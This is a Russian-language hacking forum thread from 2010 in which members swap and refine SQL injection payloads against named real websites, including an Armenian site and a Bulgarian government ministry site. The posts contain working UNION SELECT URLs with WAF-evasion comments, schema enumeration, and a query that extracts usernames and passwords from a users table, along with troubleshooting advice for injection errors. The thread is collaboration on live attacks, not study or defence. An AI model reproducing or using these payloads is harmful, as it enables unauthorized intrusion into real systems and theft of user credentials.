Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    611
    Likes Received:
    117
    Reputations:
    37
    :) Об этом и хотел спросить :)
     
  2. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    a vot zdes ??

    http://www.aspik.am/index.php?p=-5+union+select+1
     
  3. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    WAF не дремлет...
    Code:
    http://www.aspik.am/index.php?p=-5+union+/*!select*/+concat_ws(0x3a,version(),database(),user())
     
    4 people like this.
  4. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    что делать есле information_schema идет но выдает ошибку есле добовляю "limit+... иле group_concat?
    есть способы обхода этой ошибки иле можно заменить limit както?
     
    _________________________
    #11444 Дирижабль, 17 Feb 2010
    Last edited: 17 Feb 2010
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    LIMIT можно:
    Code:
    WHERE field_name NOT IN (a, b, c ,d)
    group_concat - хз...
     
  6. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    Пацаны, хелп, плиз )))
    HTML:
    http://www.site.com/script.asp?id=1'+or+1=@@version--
    Выдает:
    HTML:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 
    
    [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=1' or 1=@@version--'. 
    
    /script.asp, line 17
    Что за нах**?
     
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Access не держит комментарии.
     
    1 person likes this.
  8. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    Т.е. нифига не получится?
     
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Т.е екстрасенсы в отпуске
    Я написал то, что вижу, исходя из того, что ты дал

    Или иди статью читай, или линк давай
     
  10. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    HTML:
    http://www.mlsp.government.bg/showimage.asp?id=1'+or+1=@@version--
    Скромно, да? =))

    P.S. Я статьи все уже давно наизусть знаю, просто давно не было MSSQL-INJ поэтому решил спросить.
     
    #11450 ~EviL~, 17 Feb 2010
    Last edited: 17 Feb 2010
  11. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    143
    Likes Received:
    244
    Reputations:
    73
    это Microsoft Access а не MS SQL. Доступа к msysobjects как всегда нету. И в id=1' кавычка не нужна.
     
    1 person likes this.
  12. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    192
    Likes Received:
    675
    Reputations:
    333
    мб потому что это mssql?)
    мб потому что это access?)
    www.mlsp.government.bg/EIF/forum/reply.asp?id=-4+union+select+1,1,1,1,1,1,1,1,1,username%2b'<=>'%2bpassword,1,1,1,1,1+from+users
     
    3 people like this.
  13. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    izvini a dalse kak budet ??

    http://www.aspik.am/index.php?p=-5+union+/*!select*/+concat(table_name)*/+from*/+information_schema.tables*/

    ili kak ??
    a mojet podrobnee voobse eto kakoy metod ??
     
  14. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    LokbatanLi
    Например так
    http://www.aspik.am/index.php?p=-5+union+/*!select*/+/*!table_name*/+from+information_schema.tables+limit+19,1
     
  15. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    476
    Likes Received:
    190
    Reputations:
    221
    А есть какая-нибудь функция типа NAME_CONST??? В скрипте два запроса. Версия 5. NAME_CONST не работает
     
  16. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    извини Jokester

    а ето какоы метод или есть статя об етому ??
     
  17. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    При попытки произвести SQl inj выводится ошибка,
    но "order by 12" съела, а union+select выдаёт ошибку
    Куда копать, если выдаёт такую ошибку ?
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1,2,3,4,5,6,7,8,9,10,11,12-- order by foto_foto.d_dobavl desc limit 1' at line 1
    
     
    #11457 SeNaP, 18 Feb 2010
    Last edited: 18 Feb 2010
  18. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    попробуй так
     
    _________________________
  19. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    не помогло :(
     
  20. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    SeNaP,

    давай линк, ибо это гадание на кофейной гуще....
     
Loading...
Thread Status:
Not open for further replies.